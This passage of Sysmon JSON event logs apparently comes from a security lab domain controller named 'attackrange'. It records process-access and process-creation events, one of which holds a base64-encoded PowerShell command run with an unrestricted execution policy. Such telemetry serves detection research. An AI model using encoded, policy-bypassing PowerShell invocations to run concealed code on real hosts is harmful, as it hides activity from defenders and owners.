Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4410,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.333\r\nProcessGuid: {41C8662E-20BB-5F25-0000-00108C7D0600}\r\nProcessId: 1592\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BB-5F25-0000-0020E0610600}\r\nLogonId: 0x661E0\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nParentProcessId: 1632\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.333","ProcessGuid":"{41C8662E-20BB-5F25-0000-00108C7D0600}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BB-5F25-0000-0020E0610600}","LogonId":"0x661e0","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{41C8662E-20BB-5F25-0000-0010A2710600}","ParentProcessId":"1632","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4411,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nSourceProcessId: 1632\r\nSourceThreadId: 2396\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-00108C7D0600}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+675c2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a63cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6751510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a2488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a82d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a66251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a581d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a642fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a63cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6751510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a4ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a4a127(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-0010A2710600}","SourceProcessId":"1632","SourceThreadId":"2396","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-00108C7D0600}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+675c2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a63cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6751510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a2488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a82d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a66251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a581d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a642fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a63cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6751510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a4ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a4a127(wow64)","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4412,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-00108C7D0600}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-00108C7D0600}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4413,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4414,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4415,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 